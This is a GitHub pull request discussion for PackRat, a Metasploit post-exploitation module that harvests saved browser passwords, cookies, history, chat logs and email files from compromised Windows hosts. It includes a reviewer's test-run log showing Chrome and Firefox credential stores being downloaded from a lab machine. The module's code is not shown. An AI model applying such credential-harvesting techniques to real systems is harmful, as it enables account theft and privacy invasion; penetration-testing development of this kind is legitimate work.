Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add 'PackRat' post exploitation module -- gathers many end user application artefacts #5433

Closed
wants to merge 4 commits into from
Closed

Add 'PackRat' post exploitation module -- gathers many end user application artefacts #5433

wants to merge 4 commits into from

Conversation

cliffe
Copy link

@cliffe cliffe commented May 28, 2015

This post exploitation module has an extensive list of artefacts that it can gather from applications on end user systems.

Artefacts include: chat logins and logs, browser logins and history and cookies, email logins and emails sent and received and deleted, contacts, and many others. These artefacts are collected from applications including: 12 browsers, 13 chat/IM/IRC applications, 6 email clients, and 1 game.

The use case for this post-exploitation module is to specify the types of artefacts you are interested in, to gather the relevant files depending on your aims.

Show options illustrates the many kinds of information that can be selectively gathered.
show options

So for example, to gather all database files from Viber:
choose set options

choose

Gathering everything is also an option:
run_all
...
end_all

Loot!:
saved to loot

This module was developed by Barwar Salim M for his final year project at Leeds Beckett University. Guidance, code clean-up and some additions by Z. Cliffe Schreuders.

We believe that this module will substantially increase the post-exploitation information gathering coverage for files of interest on end user systems.

@cliffe
Create enum_application_artefacts_packrat.rb
9889d16 
This post exploitation module has an extensive list of artefacts that it can gather from applications on end user systems.

Artefacts include: chat logins and logs, browser logins and history and cookies, email logins and emails sent and received and deleted, contacts, and many others. These artefacts are collected from applications including: 12 browsers, 13 chat/IM/IRC applications, 6 email clients, and 1 game.

The use case for this post-exploitation module is to specify the types of artefacts you are interested in, to gather the relevant files depending on your aims.
@kernelsmith
Copy link
Contributor

Cool stuff! I think you want "artifacts" however vs "artefacts". Additionally, can you confirm or point to any licensing information? Don't want to get in trouble! ;)

@cliffe
Copy link
Author

cliffe commented May 29, 2015

Hi @kernelsmith,

The code has been updated to use the US spelling.

We can confirm the code is released under the Metasploit Framework License (MSF_LICENSE and/or BSD_LICENSE).

Thanks.

@kernelsmith
Copy link
Contributor

ah, I wasn't sure if it was a regional thing or not because both spellings were used. Thanks!

jvazquez-r7
jvazquez-r7 reviewed Jun 26, 2015
View reviewed changes
modules/post/windows/gather/enum_application_artifacts_packrat.rb
@@ -0,0 +1,918 @@
##
# This module requires Metasploit: http//metasploit.com/download
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

$ tools/msftidy.rb modules/post/windows/gather/enum_application_artifacts_packrat.rb
modules/post/windows/gather/enum_application_artifacts_packrat.rb - [INFO] Invalid URL: # This module requires Metasploit: http//metasploit.com

@jvazquez-r7
Copy link
Contributor

I honestly feel like this is too verbose:

msf post(enum_application_artifacts_packrat) > run


PackRat is searching and gathering...

Filtering based on these selections:

    APPCATEGORY: All, APPLICATION: All, ARTIFACTS: All

[*] Searching for Incredimail's Msg.iml files in Administrator's user directory...
[-] Incredimail's Msg.iml not found in Administrator's user directory

[*] Searching for Outlook's Deleted items.dbx files in Administrator's user directory...
[-] Outlook's Deleted items.dbx not found in Administrator's user directory

[*] Searching for Outlook's Drafts.dbx files in Administrator's user directory...
[-] Outlook's Drafts.dbx not found in Administrator's user directory

[*] Searching for Outlook's Folders.dbx files in Administrator's user directory...
[-] Outlook's Folders.dbx not found in Administrator's user directory

[*] Searching for Outlook's Inbox.dbx files in Administrator's user directory...
[-] Outlook's Inbox.dbx not found in Administrator's user directory

[*] Searching for Outlook's Offline.dbx files in Administrator's user directory...
[-] Outlook's Offline.dbx not found in Administrator's user directory

[*] Searching for Outlook's Outbox.dbx files in Administrator's user directory...
[-] Outlook's Outbox.dbx not found in Administrator's user directory

[*] Searching for Outlook's Sent items.dbx files in Administrator's user directory...
[-] Outlook's Sent items.dbx not found in Administrator's user directory

[*] Searching for Operamail's Wand.dat files in Administrator's user directory...
[-] Operamail's Wand.dat not found in Administrator's user directory

[*] Searching for Operamail's *.mbs files in Administrator's user directory...
[-] Operamail's *.mbs not found in Administrator's user directory

[*] Searching for Postbox's Inbox files in Administrator's user directory...
[-] Postbox's Inbox not found in Administrator's user directory

[*] Searching for Postbox's Sent* files in Administrator's user directory...
[-] Postbox's Sent* not found in Administrator's user directory

[*] Searching for Postbox's *.msf files in Administrator's user directory...
[-] Postbox's *.msf not found in Administrator's user directory

[*] Searching for Postbox's Archive.msf files in Administrator's user directory...
[-] Postbox's Archive.msf not found in Administrator's user directory

[*] Searching for Postbox's Bulk mail.msf files in Administrator's user directory...
[-] Postbox's Bulk mail.msf not found in Administrator's user directory

[*] Searching for Postbox's Draft.msf files in Administrator's user directory...
[-] Postbox's Draft.msf not found in Administrator's user directory

[*] Searching for Postbox's Inbox.msf files in Administrator's user directory...
[-] Postbox's Inbox.msf not found in Administrator's user directory

[*] Searching for Postbox's Sent*.msf files in Administrator's user directory...
[-] Postbox's Sent*.msf not found in Administrator's user directory

[*] Searching for Postbox's Sent.msf files in Administrator's user directory...
[-] Postbox's Sent.msf not found in Administrator's user directory

[*] Searching for Postbox's Templates.msf files in Administrator's user directory...
[-] Postbox's Templates.msf not found in Administrator's user directory

[*] Searching for Postbox's Trash.msf files in Administrator's user directory...
[-] Postbox's Trash.msf not found in Administrator's user directory

[*] Searching for Thunderbird's Signons.sqlite files in Administrator's user directory...
[-] Thunderbird's Signons.sqlite not found in Administrator's user directory

[*] Searching for Thunderbird's Key3.db files in Administrator's user directory...
[-] Thunderbird's Key3.db not found in Administrator's user directory

[*] Searching for Thunderbird's Cert8.db files in Administrator's user directory...
[-] Thunderbird's Cert8.db not found in Administrator's user directory

[*] Searching for Thunderbird's Inbox files in Administrator's user directory...
[-] Thunderbird's Inbox not found in Administrator's user directory

[*] Searching for Thunderbird's Sent files in Administrator's user directory...
[-] Thunderbird's Sent not found in Administrator's user directory

[*] Searching for Thunderbird's Trash files in Administrator's user directory...
[-] Thunderbird's Trash not found in Administrator's user directory

[*] Searching for Thunderbird's Drafts files in Administrator's user directory...
[-] Thunderbird's Drafts not found in Administrator's user directory

[*] Searching for Thunderbird's Global-messages-db.sqlite files in Administrator's user directory...
[-] Thunderbird's Global-messages-db.sqlite not found in Administrator's user directory

[*] Searching for Windowlivemail's *.oeaccount files in Administrator's user directory...
[*] Windowlivemail's *.oeaccount file found
[*] Searching for Aim's Aimx.bin files in Administrator's user directory...
[-] Aim's Aimx.bin not found in Administrator's user directory

[*] Searching for Aim's *.html files in Administrator's user directory...
[-] Aim's *.html not found in Administrator's user directory

[*] Searching for Digsby's Logininfo.yaml files in Administrator's user directory...
[-] Digsby's Logininfo.yaml not found in Administrator's user directory

[*] Searching for Gadugadu's Thumbs.db files in Administrator's user directory...
[-] Gadugadu's Thumbs.db not found in Administrator's user directory

[*] Searching for Gadugadu's Profile.ini files in Administrator's user directory...
[-] Gadugadu's Profile.ini not found in Administrator's user directory

[*] Searching for Icq's Owner.mdb files in Administrator's user directory...
[-] Icq's Owner.mdb not found in Administrator's user directory

[*] Searching for Icq's Messages.mdb files in Administrator's user directory...
[-] Icq's Messages.mdb not found in Administrator's user directory

[*] Searching for Miranda's Home.dat files in Administrator's user directory...
[-] Miranda's Home.dat not found in Administrator's user directory

[*] Searching for Nimbuzz's Nimbuzz.log files in Administrator's user directory...
[-] Nimbuzz's Nimbuzz.log not found in Administrator's user directory

[*] Searching for Pidgen's Accounts.xml files in Administrator's user directory...
[-] Pidgen's Accounts.xml not found in Administrator's user directory

[*] Searching for Pidgen's *.html files in Administrator's user directory...
[-] Pidgen's *.html not found in Administrator's user directory

[*] Searching for Qq's Userheadtemp* files in Administrator's user directory...
[-] Qq's Userheadtemp* not found in Administrator's user directory

[*] Searching for Skype's Main.db files in Administrator's user directory...
[-] Skype's Main.db not found in Administrator's user directory

[*] Searching for Tango's Contacts.dat files in Administrator's user directory...
[-] Tango's Contacts.dat not found in Administrator's user directory

[*] Searching for Tango's Install.log files in Administrator's user directory...
[-] Tango's Install.log not found in Administrator's user directory

[*] Searching for Tlen.pl's Profiles.dat files in Administrator's user directory...
[-] Tlen.pl's Profiles.dat not found in Administrator's user directory

[*] Searching for Tlen.pl's *.jpg files in Administrator's user directory...
[-] Tlen.pl's *.jpg not found in Administrator's user directory

[*] Searching for Trillian's Accounts.ini files in Administrator's user directory...
[-] Trillian's Accounts.ini not found in Administrator's user directory

[*] Searching for Trillian's *.log files in Administrator's user directory...
[-] Trillian's *.log not found in Administrator's user directory

[*] Searching for Viber's Viber.db files in Administrator's user directory...
[-] Viber's Viber.db not found in Administrator's user directory

[*] Searching for Viber's Thumbs.db files in Administrator's user directory...
[-] Viber's Thumbs.db not found in Administrator's user directory

[*] Searching for Viber's *.jpg files in Administrator's user directory...
[-] Viber's *.jpg not found in Administrator's user directory

[*] Searching for Xchat's *.txt files in Administrator's user directory...
[-] Xchat's *.txt not found in Administrator's user directory

[*] Searching for Xfire's Xfireuser.ini files in Administrator's user directory...
[-] Xfire's Xfireuser.ini not found in Administrator's user directory

[*] Searching for Xfire's Xfireuser.ini files in Administrator's user directory...
[-] Xfire's Xfireuser.ini not found in Administrator's user directory

[*] Searching for Avant's Forms.dat files in Administrator's user directory...
[-] Avant's Forms.dat not found in Administrator's user directory

[*] Searching for Comodo's Login data files in Administrator's user directory...
[-] Comodo's Login data not found in Administrator's user directory

[*] Searching for Comodo's Cookies files in Administrator's user directory...
[-] Comodo's Cookies not found in Administrator's user directory

[*] Searching for Comodo's History files in Administrator's user directory...
[-] Comodo's History not found in Administrator's user directory

[*] Searching for Comodo's Visited links files in Administrator's user directory...
[-] Comodo's Visited links not found in Administrator's user directory

[*] Searching for Coolnovo's Login data files in Administrator's user directory...
[-] Coolnovo's Login data not found in Administrator's user directory

[*] Searching for Chrome's Login data files in Administrator's user directory...
[*] Chrome's Login data file found
[*] Downloading C:\Documents and Settings\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data
[*] Chrome Login data downloaded (Chrome's saved Username & Passwords)
[+] File saved to /Users/jvazquez/.msf4/loot/20150626163908_default_172.16.158.133_chromeLoginData_011328.bin

[*] Searching for Chrome's Cookies files in Administrator's user directory...
[*] Chrome's Cookies file found
[*] Downloading C:\Documents and Settings\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Cookies
[*] Chrome Cookies downloaded (Chrome Cookies)
[+] File saved to /Users/jvazquez/.msf4/loot/20150626163909_default_172.16.158.133_chromeCookies_006520.bin

[*] Searching for Chrome's History files in Administrator's user directory...
[*] Chrome's History file found
[*] Downloading C:\Documents and Settings\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\History
[*] Chrome History downloaded (Chrome History)
[+] File saved to /Users/jvazquez/.msf4/loot/20150626163911_default_172.16.158.133_chromeHistory_013030.bin

[*] Searching for Firefox's Logins.json files in Administrator's user directory...
[*] Firefox's Logins.json file found
[*] Searching for Firefox's Cert8.db files in Administrator's user directory...
[*] Firefox's Cert8.db file found
[*] Downloading C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\c4x38bcq.default\cert8.db
[*] Firefox Cert8.db downloaded (Firefox's saved Username & Passwords)
[+] File saved to /Users/jvazquez/.msf4/loot/20150626163913_default_172.16.158.133_firefoxcert8.db_463486.db

[*] Searching for Firefox's Key3.db files in Administrator's user directory...
[*] Firefox's Key3.db file found
[*] Downloading C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\c4x38bcq.default\key3.db
[*] Firefox Key3.db downloaded (Firefox's saved Username & Passwords)
[+] File saved to /Users/jvazquez/.msf4/loot/20150626163914_default_172.16.158.133_firefoxkey3.db_051687.db

[*] Searching for Firefox's Places.sqlite files in Administrator's user directory...
[*] Firefox's Places.sqlite file found
[*] Downloading C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\c4x38bcq.default\places.sqlite
[*] Firefox Places.sqlite downloaded (FireFox History)
[+] File saved to /Users/jvazquez/.msf4/loot/20150626163915_default_172.16.158.133_firefoxplaces.sq_278232.bin

[*] Searching for Firefox's Formhistory.sqlite files in Administrator's user directory...
[*] Firefox's Formhistory.sqlite file found
[*] Downloading C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\c4x38bcq.default\formhistory.sqlite
[*] Firefox Formhistory.sqlite downloaded (FireFox's saved Username using sqlite tool)
[+] File saved to /Users/jvazquez/.msf4/loot/20150626163942_default_172.16.158.133_firefoxformhisto_630372.bin

[*] Searching for Firefox's Cookies.sqlite files in Administrator's user directory...
[*] Firefox's Cookies.sqlite file found
[*] Downloading C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\c4x38bcq.default\cookies.sqlite
[*] Firefox Cookies.sqlite downloaded (Firefox's cookies)
[+] File saved to /Users/jvazquez/.msf4/loot/20150626163943_default_172.16.158.133_firefoxcookies.s_492178.bin

[*] Searching for Flock's Formhistory.sqlite files in Administrator's user directory...
[-] Flock's Formhistory.sqlite not found in Administrator's user directory

[*] Searching for Flock's Downloads.sqlite files in Administrator's user directory...
[-] Flock's Downloads.sqlite not found in Administrator's user directory

[*] Searching for Flock's Cookies.sqlite files in Administrator's user directory...
[-] Flock's Cookies.sqlite not found in Administrator's user directory

[*] Searching for Ie's Index.dat files in Administrator's user directory...
[*] Ie's Index.dat file found
[*] Downloading C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
[*] Ie Index.dat downloaded (IE's History)
[+] File saved to /Users/jvazquez/.msf4/loot/20150626163947_default_172.16.158.133_IEindex.dat_939180.dat

[*] Downloading C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012015060520150606\index.dat
[*] Ie Index.dat downloaded (IE's History)
[+] File saved to /Users/jvazquez/.msf4/loot/20150626163948_default_172.16.158.133_IEindex.dat_002048.dat

[*] Searching for K-meleon's Signons.sqlite files in Administrator's user directory...
[-] K-meleon's Signons.sqlite not found in Administrator's user directory

[*] Searching for K-meleon's Key3.db files in Administrator's user directory...
[-] K-meleon's Key3.db not found in Administrator's user directory

[*] Searching for K-meleon's Cert8.db files in Administrator's user directory...
[-] K-meleon's Cert8.db not found in Administrator's user directory

[*] Searching for K-meleon's Cookies.sqlite files in Administrator's user directory...
[-] K-meleon's Cookies.sqlite not found in Administrator's user directory

[*] Searching for K-meleon's Formhistory.sqlite files in Administrator's user directory...
[-] K-meleon's Formhistory.sqlite not found in Administrator's user directory

[*] Searching for K-meleon's Places.sqlite files in Administrator's user directory...
[-] K-meleon's Places.sqlite not found in Administrator's user directory

[*] Searching for Maxthon's Magicfill2.dat files in Administrator's user directory...
[-] Maxthon's Magicfill2.dat not found in Administrator's user directory

[*] Searching for Opera's Login data files in Administrator's user directory...
[-] Opera's Login data not found in Administrator's user directory

[*] Searching for Opera's Cookies files in Administrator's user directory...
[-] Opera's Cookies not found in Administrator's user directory

[*] Searching for Opera's Visited links files in Administrator's user directory...
[-] Opera's Visited links not found in Administrator's user directory

[*] Searching for Srware's Login data files in Administrator's user directory...
[-] Srware's Login data not found in Administrator's user directory

[*] Searching for Srware's Cookies files in Administrator's user directory...
[-] Srware's Cookies not found in Administrator's user directory

[*] Searching for Srware's History files in Administrator's user directory...
[-] Srware's History not found in Administrator's user directory

[*] Searching for Safari's Keychain.plist files in Administrator's user directory...
[-] Safari's Keychain.plist not found in Administrator's user directory

[*] Searching for Seamonkey's Logins.json files in Administrator's user directory...
[*] Seamonkey's Logins.json file found
[*] Searching for Seamonkey's Cert8.db files in Administrator's user directory...
[*] Seamonkey's Cert8.db file found
[*] Downloading C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\c4x38bcq.default\cert8.db
[*] Seamonkey Cert8.db downloaded (SeaMonkey's saved Username & Passwords)
[+] File saved to /Users/jvazquez/.msf4/loot/20150626163950_default_172.16.158.133_seamonkeycert8.d_495747.db

[*] Searching for Seamonkey's Key3.db files in Administrator's user directory...
[*] Seamonkey's Key3.db file found
[*] Downloading C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\c4x38bcq.default\key3.db
[*] Seamonkey Key3.db downloaded (SeaMonkey's saved Username & Passwords)
[+] File saved to /Users/jvazquez/.msf4/loot/20150626163952_default_172.16.158.133_seamonkeykey3.db_483327.db

[*] Searching for Seamonkey's Formhistory.sqlite files in Administrator's user directory...
[*] Seamonkey's Formhistory.sqlite file found
[*] Downloading C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\c4x38bcq.default\formhistory.sqlite
[*] Seamonkey Formhistory.sqlite downloaded (SeaMonkey's saved Username)
[+] File saved to /Users/jvazquez/.msf4/loot/20150626163953_default_172.16.158.133_seamonkeyformhis_648970.bin

[*] Searching for Seamonkey's Places.sqlite files in Administrator's user directory...
[*] Seamonkey's Places.sqlite file found
[*] Downloading C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\c4x38bcq.default\places.sqlite
[*] Seamonkey Places.sqlite downloaded (SeaMonkey History)
[+] File saved to /Users/jvazquez/.msf4/loot/20150626163955_default_172.16.158.133_seamonkeyplaces._326537.bin

[*] Searching for Seamonkey's Cookies.sqlite files in Administrator's user directory...
[*] Seamonkey's Cookies.sqlite file found
[*] Downloading C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\c4x38bcq.default\cookies.sqlite
[*] Seamonkey Cookies.sqlite downloaded (SeaMonkey's cookies)
[+] File saved to /Users/jvazquez/.msf4/loot/20150626164021_default_172.16.158.133_seamonkeycookies_970800.bin

[*] Downloaded 15 artifact(s), attempted 94.

[*] Post module execution completed

What about being less verbose by default, for example switching to "vprint". I feel like being less verbose by default and showing just a summary table at the end would look better.

@jvazquez-r7
Copy link
Contributor

Since it has been more than a month of the last review and has not been any answer I'm going to move this module to unstable at the moment. @cliffe feel free to reopen if at any moment you would like to finish review in order to merge it into rapid7/master. Thanks!

@jvazquez-r7 jvazquez-r7 self-assigned this Jul 31, 2015
jvazquez-r7 added a commit to jvazquez-r7/metasploit-framework that referenced this pull request Aug 1, 2015
@jvazquez-r7
Move rapid7#5433 module to unstable
6401062
@jvazquez-r7 jvazquez-r7 mentioned this pull request Aug 1, 2015
Merged
jvazquez-r7 added a commit that referenced this pull request Aug 1, 2015
@jvazquez-r7
Land #5798, move PackRat post module to unstable
4551a58 
* Close #5433 by moving the module to unstable
@jvazquez-r7
Copy link
Contributor

@cliffe #5798 has moved the module in this PR to the unstable branch. Feel free to open a new PR once you're ready to finish the review in order to land into rapid7/master. Thanks!

@jvazquez-r7 jvazquez-r7 closed this Aug 1, 2015
@cliffe
Copy link
Author

cliffe commented Aug 1, 2015

Thanks for the code review and sorry for the delay. I will get to this in the next couple of weeks and push the changes. @jvazquez-r7, can I push to this branch/pull request, to keep all the comments and review, or do have to start a new pull request (loosing the above context for changes)?

@ghost ghost mentioned this pull request Apr 8, 2019
Closed
@KazuCyber KazuCyber mentioned this pull request May 14, 2021
Merged
4 tasks
This pull request was closed.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@jvazquez-r7 jvazquez-r7

Labels
feature module
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
5 participants
@cliffe @kernelsmith @jvazquez-r7 @void-in @bcook-r7